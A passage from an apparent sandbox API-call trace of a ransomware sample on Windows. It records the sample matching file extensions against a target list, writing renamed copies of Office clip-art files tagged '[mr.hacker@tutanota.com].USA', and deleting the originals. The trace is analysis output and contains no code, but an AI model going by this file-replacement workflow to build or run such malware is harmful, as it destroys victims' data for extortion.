lpString2="8.GIF") returned -1 [0273.432] lstrlenW (lpString=".pdf") returned 4 [0273.432] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0273.432] lstrlenW (lpString=".xls") returned 4 [0273.432] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0273.432] lstrlenW (lpString=".xlsx") returned 5 [0273.432] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1 [0273.432] lstrlenW (lpString=".ppt") returned 4 [0273.432] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0273.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.432] lstrlenW (lpString=".zip") returned 4 [0273.432] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0273.432] lstrlenW (lpString=".rar") returned 4 [0273.432] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0273.432] lstrlenW (lpString=".bz2") returned 4 [0273.432] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0273.432] lstrlenW (lpString=".7z") returned 3 [0273.432] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0273.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.432] lstrlenW (lpString=".dbf") returned 4 [0273.432] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0273.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.432] lstrlenW (lpString=".1cd") returned 4 [0273.432] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0273.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.432] lstrlenW (lpString=".jpg") returned 4 [0273.432] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0273.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.433] lstrlenW (lpString=".doc") returned 4 [0273.433] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0273.433] lstrlenW (lpString=".docx") returned 5 [0273.433] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1 [0273.433] lstrlenW (lpString=".pdf") returned 4 [0273.433] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0273.433] lstrlenW (lpString=".xls") returned 4 [0273.433] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0273.433] lstrlenW (lpString=".xlsx") returned 5 [0273.433] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1 [0273.433] lstrlenW (lpString=".ppt") returned 4 [0273.433] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0273.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.433] lstrlenW (lpString=".zip") returned 4 [0273.433] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0273.433] lstrlenW (lpString=".rar") returned 4 [0273.433] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0273.433] lstrlenW (lpString=".bz2") returned 4 [0273.433] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0273.433] lstrlenW (lpString=".7z") returned 3 [0273.433] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0273.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.433] lstrlenW (lpString=".dbf") returned 4 [0273.433] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0273.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.433] lstrlenW (lpString=".1cd") returned 4 [0273.433] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0273.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.433] lstrlenW (lpString=".jpg") returned 4 [0273.433] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0273.434] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.434] lstrlenW (lpString="J0086384.WMF") returned 12 [0273.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.435] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=9734) returned 1 [0273.436] CloseHandle (hObject=0x380) returned 1 [0273.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf")) returned 0x20 [0273.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.436] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.436] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.436] GetLastError () returned 0x0 [0273.436] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x2606, lpOverlapped=0x0) returned 1 [0273.438] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x2610, lpOverlapped=0x0) returned 1 [0273.439] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.439] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.439] SetEndOfFile (hFile=0x3b4) returned 1 [0273.439] CloseHandle (hObject=0x3b4) returned 1 [0273.439] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.439] SetEndOfFile (hFile=0x380) returned 1 [0273.441] CloseHandle (hObject=0x380) returned 1 [0273.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.441] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf")) returned 1 [0273.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.441] lstrlenW (lpString=".doc") returned 4 [0273.441] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.441] lstrlenW (lpString=".docx") returned 5 [0273.441] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0273.441] lstrlenW (lpString=".pdf") returned 4 [0273.441] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.441] lstrlenW (lpString=".xls") returned 4 [0273.441] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.442] lstrlenW (lpString=".xlsx") returned 5 [0273.442] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0273.442] lstrlenW (lpString=".ppt") returned 4 [0273.442] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.442] lstrlenW (lpString=".zip") returned 4 [0273.442] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.442] lstrlenW (lpString=".rar") returned 4 [0273.442] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.442] lstrlenW (lpString=".bz2") returned 4 [0273.442] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.442] lstrlenW (lpString=".7z") returned 3 [0273.442] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.442] lstrlenW (lpString=".dbf") returned 4 [0273.442] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.442] lstrlenW (lpString=".1cd") returned 4 [0273.442] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.442] lstrlenW (lpString=".jpg") returned 4 [0273.442] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.442] lstrlenW (lpString=".doc") returned 4 [0273.442] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.442] lstrlenW (lpString=".docx") returned 5 [0273.442] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0273.442] lstrlenW (lpString=".pdf") returned 4 [0273.442] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.443] lstrlenW (lpString=".xls") returned 4 [0273.443] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.443] lstrlenW (lpString=".xlsx") returned 5 [0273.443] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0273.443] lstrlenW (lpString=".ppt") returned 4 [0273.443] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.443] lstrlenW (lpString=".zip") returned 4 [0273.443] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.443] lstrlenW (lpString=".rar") returned 4 [0273.443] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.443] lstrlenW (lpString=".bz2") returned 4 [0273.443] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.443] lstrlenW (lpString=".7z") returned 3 [0273.443] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.443] lstrlenW (lpString=".dbf") returned 4 [0273.443] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.443] lstrlenW (lpString=".1cd") returned 4 [0273.443] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 63 [0273.443] lstrlenW (lpString=".jpg") returned 4 [0273.443] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.443] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.443] lstrlenW (lpString="J0086420.WMF") returned 12 [0273.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.444] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=9596) returned 1 [0273.444] CloseHandle (hObject=0x380) returned 1 [0273.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf")) returned 0x20 [0273.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.444] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.444] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.445] GetLastError () returned 0x0 [0273.445] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x257c, lpOverlapped=0x0) returned 1 [0273.446] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x2580, lpOverlapped=0x0) returned 1 [0273.447] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.447] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.447] SetEndOfFile (hFile=0x3b4) returned 1 [0273.447] CloseHandle (hObject=0x3b4) returned 1 [0273.447] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.447] SetEndOfFile (hFile=0x380) returned 1 [0273.450] CloseHandle (hObject=0x380) returned 1 [0273.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.450] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf")) returned 1 [0273.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.450] lstrlenW (lpString=".doc") returned 4 [0273.450] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.450] lstrlenW (lpString=".docx") returned 5 [0273.450] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0273.450] lstrlenW (lpString=".pdf") returned 4 [0273.450] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.450] lstrlenW (lpString=".xls") returned 4 [0273.451] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.451] lstrlenW (lpString=".xlsx") returned 5 [0273.451] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0273.451] lstrlenW (lpString=".ppt") returned 4 [0273.451] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.451] lstrlenW (lpString=".zip") returned 4 [0273.451] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.451] lstrlenW (lpString=".rar") returned 4 [0273.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.451] lstrlenW (lpString=".bz2") returned 4 [0273.451] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.451] lstrlenW (lpString=".7z") returned 3 [0273.451] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.451] lstrlenW (lpString=".dbf") returned 4 [0273.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.451] lstrlenW (lpString=".1cd") returned 4 [0273.451] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.451] lstrlenW (lpString=".jpg") returned 4 [0273.451] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.451] lstrlenW (lpString=".doc") returned 4 [0273.451] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.451] lstrlenW (lpString=".docx") returned 5 [0273.451] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0273.451] lstrlenW (lpString=".pdf") returned 4 [0273.451] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.451] lstrlenW (lpString=".xls") returned 4 [0273.452] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.452] lstrlenW (lpString=".xlsx") returned 5 [0273.452] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0273.452] lstrlenW (lpString=".ppt") returned 4 [0273.452] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.452] lstrlenW (lpString=".zip") returned 4 [0273.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.452] lstrlenW (lpString=".rar") returned 4 [0273.452] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.452] lstrlenW (lpString=".bz2") returned 4 [0273.452] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.452] lstrlenW (lpString=".7z") returned 3 [0273.452] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.452] lstrlenW (lpString=".dbf") returned 4 [0273.452] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.452] lstrlenW (lpString=".1cd") returned 4 [0273.452] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 63 [0273.452] lstrlenW (lpString=".jpg") returned 4 [0273.452] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.452] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.452] lstrlenW (lpString="J0086424.WMF") returned 12 [0273.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.453] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=17016) returned 1 [0273.453] CloseHandle (hObject=0x380) returned 1 [0273.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf")) returned 0x20 [0273.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.453] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.453] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.454] GetLastError () returned 0x0 [0273.454] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x4278, lpOverlapped=0x0) returned 1 [0273.456] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x4280, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x4280, lpOverlapped=0x0) returned 1 [0273.457] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.457] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.457] SetEndOfFile (hFile=0x3b4) returned 1 [0273.457] CloseHandle (hObject=0x3b4) returned 1 [0273.457] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.457] SetEndOfFile (hFile=0x380) returned 1 [0273.459] CloseHandle (hObject=0x380) returned 1 [0273.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.459] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf")) returned 1 [0273.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63 [0273.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63 [0273.459] lstrlenW (lpString=".doc") returned 4 [0273.459] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.459] lstrlenW (lpString=".docx") returned 5 [0273.459] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0273.459] lstrlenW (lpString=".pdf") returned 4 [0273.459] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.460] lstrlenW (lpString=".xls") returned 4 [0273.460] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.460] lstrlenW (lpString=".xlsx") returned 5 [0273.460] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0273.460] lstrlenW (lpString=".ppt") returned 4 [0273.460] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63 [0273.460] lstrlenW (lpString=".zip") returned 4 [0273.460] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.460] lstrlenW 